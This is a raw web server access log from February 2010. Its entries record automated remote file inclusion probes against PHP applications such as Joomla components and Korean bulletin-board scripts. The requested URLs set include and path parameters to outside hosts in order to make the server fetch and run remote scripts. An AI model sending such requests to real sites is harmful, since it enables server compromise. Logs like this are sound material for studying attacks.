89.36.175.10 - - [18/Feb/2010:07:51:30 -0800] "GET /logs/access_100126.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:51:49 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:51:50 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:51:51 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:52:00 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:52:00 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:52:00 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:52:03 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:52:08 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:52:15 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:52:16 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:52:20 -0800] "GET /logs/access_100203.log%20%20/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:52:21 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:52:23 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:52:30 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:52:31 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:52:46 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:52:46 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:52:46 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:52:47 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:52:48 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:52:49 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:52:49 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:52:56 -0800] "GET /logs/access_100205.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:16 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:17 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:18 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:22 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:23 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:25 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:26 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:28 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:29 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:31 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:31 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:31 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:32 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:32 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:53:33 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:53:42 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:53:42 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:53:42 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:53:46 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:47 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:48 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:53:48 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:53:54 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [18/Feb/2010:07:54:05 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:54:05 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:54:23 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:54:23 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:07:54:23 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:55:09 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:55:28 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:55:35 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:55:47 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:55:51 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:55:52 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:07:55:53 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:55:58 -0800] "GET /logs/access_100125.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [18/Feb/2010:07:56:00 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:56:11 -0800] "GET /logs/access_100210.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:56:48 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:56:48 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:56:57 -0800] "GET /logs/access_100203.log/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:07:57:21 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:07:57:21 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:07:57:21 -0800] "GET /logs/access_100103.log//skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:57:55 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:57:59 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:57:59 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:58:00 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:58:00 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:58:01 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:07:58:01 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:58:09 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:59:54 -0800] "GET /logs/access_100203.log/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:01:26 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:08:01:34 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:47 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:47 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:47 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:48 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:48 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:01:48 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:25 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:25 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:25 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:25 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:02:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:08:02:35 -0800] "GET /skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:08:02:36 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:08:02:36 -0800] "GET /logs/access_100103.log//skin/zero_vote/admin.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:03:00 -0800] "GET /zboard/skin/sjini_flash_gray//write.php?dir=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:03:00 -0800] "GET /logs//zboard/skin/sjini_flash_gray//write.php?dir=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:03:00 -0800] "GET /logs/access_100111.log//zboard/skin/sjini_flash_gray//write.php?dir=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:05:35 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:05:35 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:06:42 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:07:00 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:12:26 -0800] "GET /logs/access_100205.log//zboard/skin/sjini_flash_gray//write.php?dir=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:02 -0800] "GET /visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:02 -0800] "GET /logs/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:02 -0800] "GET /logs/access_100111.log%20%20/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:05 -0800] "GET /logs/access_100111.log%20%20/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:06 -0800] "GET /logs/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:06 -0800] "GET /visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:43 -0800] "GET /logs/access_100111.log/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:14:53 -0800] "GET /logs/access_100111.log/visitorupload.php?cmd=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:08:16:36 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:08:16:36 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:08:16:36 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [18/Feb/2010:08:16:56 -0800] "GET /logs/access_100210.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:17 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:17 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:17 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:19 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:19 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:08:17:20 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:37 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:17:38 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
